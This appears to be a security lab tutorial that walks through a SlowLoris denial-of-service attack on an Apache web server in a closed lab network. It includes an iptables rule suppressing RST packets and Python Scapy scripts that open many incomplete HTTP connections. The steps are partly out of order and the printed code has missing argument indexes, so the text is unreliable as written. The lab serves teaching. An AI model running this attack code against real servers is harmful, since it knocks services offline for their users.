An attacker therefore can render an Apache server unusable easily by sending incomplete HTTP requests. This is the SlowLoris attack.
Use this command to find your Web Server's IP address:
Your Web Server's IP address should be 172.16.1.202.
On the Web Server, execute these commands:
You see a default Apache page, as shown below.
service apache2 start
You should see a continuously updated list of network connections, as shown below on this page. Right now, there are no ESTABLISHED connections, only a listening process.
watch "netstat -pant"
On your Target Linux machine, you should see an ESTABLISHED connection to the server on local port 80, as shown below on this page. If you don't see it, try refreshing the browser on the Attacker Linux machine.
On the Attacker Linux Machine, open a Terminal window. In the Terminal window, execute these commands:
You should see a rule in the OUTPUT section that drops RST packets, as shown below on this page.
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP
On the Attacker Linux machine, in a Terminal window, execute this command:
In the nano window, type this script:
#!/usr/bin/env python import sys from scapy.all import * if len(sys.argv) != 3: print "Usage: ./handshake.py <target-ip> <source-port>" sys.exit(1) target = sys.argv sp = int(sys.argv) i = IP() i.dst = target print "IP layer prepared: ", i.summary() t = TCP() t.dport = 80 t.sport = sp t.flags = "S" print "Sending TCP SYN Packet: ", t.summary() ans = sr1(i/t) print "Reply was: ",ans.summary() t.seq = ans.ack t.ack = ans.seq + 1 t.flags = "A" print "Sending TCP ACK Packet: ", t.summary() ans = sr(i/t/"X")
Here is an image of the script:
Save the file with Ctrl+X, Y, Enter.
On the Attacker machine, in the Terminal window, execute these commands.
On the Web Server machine, you should see a connection from local port 80 to remote port 2000, as shown below.
chmod a+x handshake.py
./handshake.py 172.16.1.202 2000
Execute this command:
You should see the Apache server status page, with only one request being processed, as shown below on this page:
In the nano window, type in this script.
The script looks like this (split across two images because NETLAB limits the screen size):#!/usr/bin/env python import sys from scapy.all import * if len(sys.argv) != 4: print "Usage: ./slowloris.py <target-ip> <starting-source-port> <number-of-GETs>" sys.exit(1) target = sys.argv sp = int(sys.argv) numgets = int(sys.argv) print "Attacking ", target, " with ", numgets, " GETs" i = IP() i.dst = target print "IP layer prepared: ", i.summary() for s in range(sp, sp+numgets-1): t = TCP() t.dport = 80 t.sport = s t.flags = "S" ans = sr1(i/t, verbose=0) t.seq = ans.ack t.ack = ans.seq + 1 t.flags = "A" get = "GET / HTTP/1.1\r\nHost: " + target ans = sr1(i/t/get, verbose=0) print "Attacking from port ", s print "Done!"
This script is very similar to the handshake.py script. The only changes are that it sends an HTTP GET each time, which is incomplete because it is missing the final carriage return and line feed, and that it loops through many source ports.
On the Attacker Linux machine, in the Terminal window, execute these commands. In the second command, replace the IP address with the address of your Linux Target machine:
On the Web Server machine, in the Firefox window, click the Refresh button every few seconds. The grid should fill with letters, as the attack uses up all available connections.
chmod a+x slowloris.py
./slowloris.py 192.168.198.133 3000 1000
Your screen should look like the image below on this page: